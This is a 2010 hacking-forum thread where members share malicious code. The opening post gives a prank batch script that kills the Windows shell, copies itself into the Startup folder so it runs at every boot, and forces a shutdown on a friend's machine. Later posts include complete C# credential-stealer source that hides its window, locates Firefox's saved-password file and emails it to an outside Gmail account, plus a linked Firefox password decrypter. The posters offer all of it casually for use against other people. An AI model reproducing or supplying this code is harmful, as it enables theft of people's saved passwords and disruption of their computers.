Post Reply 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Interesting 3 lines :P
06-18-2010, 07:24 PM
Post: #1
Interesting 3 lines :P
If some of your friends are going on your nerves, and you want to scare him, like I, try this! Tongue

Code:
TASKKILL /F /IM "explorer.exe"
copy something.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
shutdown.exe -s -t 3 -c "Secutiry measures"

P.S You must have fast fingers to abort shutdown in 3 seconds, so be aware! Tongue

Read rules Smile
[Image: legislator.png]
Find all posts by this user
Quote this message in a reply
06-18-2010, 08:50 PM
Post: #2
RE: Interesting 3 lines :P
Ha ha ha. Yeah that is good trick. On startup you put a batch file that does shutdown. That can be annoying !
But there are tricks to overcome that !

There's a fine line between genius and insanity. I have erased this line.
Oscar Levant
There's a fine line between an administrator and black hat hacker. I have erased this line.
Dr DEBCOL
Visit this user's website Find all posts by this user
Quote this message in a reply
06-18-2010, 08:57 PM
Post: #3
RE: Interesting 3 lines :P
Ofcourse, safemode, or fast fingers, process killer Tongue But for my friend, only cure am I Tongue

Read rules Smile
[Image: legislator.png]
Find all posts by this user
Quote this message in a reply
06-18-2010, 09:07 PM
Post: #4
RE: Interesting 3 lines :P
(06-18-2010 08:57 PM)l3g1sl4tor Wrote:  Ofcourse, safemode, or fast fingers, process killer Tongue But for my friend, only cure am I Tongue
LOL Yeah, if you know how to make it, you know how to stop it.
I used to make viruses (not so harmful) and than i make an AntiVirus for that virus, if i "not intentionally" run it on my computer.

There's a fine line between genius and insanity. I have erased this line.
Oscar Levant
There's a fine line between an administrator and black hat hacker. I have erased this line.
Dr DEBCOL
Visit this user's website Find all posts by this user
Quote this message in a reply
06-18-2010, 09:25 PM
Post: #5
RE: Interesting 3 lines :P
I am deleting what I made from my PC 5-10 minutes after distribution Tongue

Read rules Smile
[Image: legislator.png]
Find all posts by this user
Quote this message in a reply
06-19-2010, 03:54 AM
Post: #6
RE: Interesting 3 lines :P
Nice Big Grin I prefer a password Stealer, so much more can be accomplished Smile .

"Character is determined more by the lack of certain experiences than by those one has had."
Friedrich Nietzsche
Visit this user's website Find all posts by this user
Quote this message in a reply
06-19-2010, 11:05 AM
Post: #7
RE: Interesting 3 lines :P
Lol. Great share Legislator.

By the way, could anyone share some type of Password stealer? If possible programmed in Java,Python,C++ or Pascal. Big Grin
I'd like to see how it works.

[Image: 45669_pythonlogo.png][Image: 45668_javalogo.png]
Find all posts by this user
Quote this message in a reply
06-19-2010, 11:11 AM (This post was last modified: 06-19-2010 11:14 AM by l3g1sl4tor.)
Post: #8
RE: Interesting 3 lines :P
Here is something I found Smile

Code:
01    using Microsoft.VisualBasic;
02    using System;
03    using System.Collections;
04    using System.Collections.Generic;
05    using System.Data;
06    using System.Diagnostics;
07    using System.IO;
08    using System.Net.Mail;
09    using System.Net;
10    using System.Text;
11    using System.Runtime.InteropServices;
12    
13    namespace ConsoleApplication1
14    {
15        internal class Program
16        {
17    
18            [DllImport("kernel32.dll")]
19            public static extern bool FreeConsole();
20            public static void Main(string[] args)
21            {
22                FreeConsole();
23                try {
24                    bool FoundFile = false;
25                    string Username = "username@gmail.com";
26                    string Password = "password";
27                    string DefaultPath = Environment.GetEnvironmentVariable("APPDATA") + "\\Mozilla\\Firefox\\Profiles";
28                    string[] Dirs = Directory.GetDirectories(DefaultPath);
29    
30                    foreach (string dir in Dirs) {
31                        if ((!FoundFile)) {
32                            string[] Files = Directory.GetFiles(dir);
33    
34                            foreach (string CurrFile in Files) {
35                                if ((!FoundFile)) {
36                                    if (System.Text.RegularExpressions.Regex.IsMatch(CurrFile, "signons3.txt")) {
37                                        SmtpClient Client = new SmtpClient("smtp.gmail.com", 587);
38                                        Client.EnableSsl = true;
39                                        NetworkCredential Creds = new NetworkCredential(Username, Password);
40                                        Client.Credentials = Creds;
41                                        MailMessage msg = new MailMessage();
42                                        msg.To.Add(new MailAddress("username@gmail.com"));
43                                        msg.From = new MailAddress(Username);
44                                        msg.Attachments.Add(new Attachment(CurrFile));
45                                        msg.Subject = "Firefox Passwords";
46                                        Client.Send(msg);
47                                        FoundFile = true;
48                                    }
49    
50                                } else {
51                                    break; // TODO: might not be correct. Was : Exit For
52                                }
53                            }
54                        } else {
55                            break; // TODO: might not be correct. Was : Exit For
56                        }
57                    }
58    
59                } catch {
60                }
61            }
62        }
63    }
Copy - paste, havent looked it, but i suppose it will use for something @Alphablend Smile

Read rules Smile
[Image: legislator.png]
Find all posts by this user
Quote this message in a reply
06-19-2010, 11:27 AM
Post: #9
RE: Interesting 3 lines :P
(06-19-2010 11:05 AM)Alphablend Wrote:  Lol. Great share Legislator.

By the way, could anyone share some type of Password stealer? If possible programmed in Java,Python,C++ or Pascal. Big Grin
I'd like to see how it works.

I have one in C and C#! Ill post next time i get a chance.

"Character is determined more by the lack of certain experiences than by those one has had."
Friedrich Nietzsche
Visit this user's website Find all posts by this user
Quote this message in a reply
06-19-2010, 12:55 PM
Post: #10
RE: Interesting 3 lines :P
FF 3.5 Decrypter C - ZeR0


Attached File(s)
.zip  [SRC][C] Firefox 3.6 Decrypter.zip (Size: 11.95 KB / Downloads: 5)

"Character is determined more by the lack of certain experiences than by those one has had."
Friedrich Nietzsche
Visit this user's website Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump:


 Quick Theme: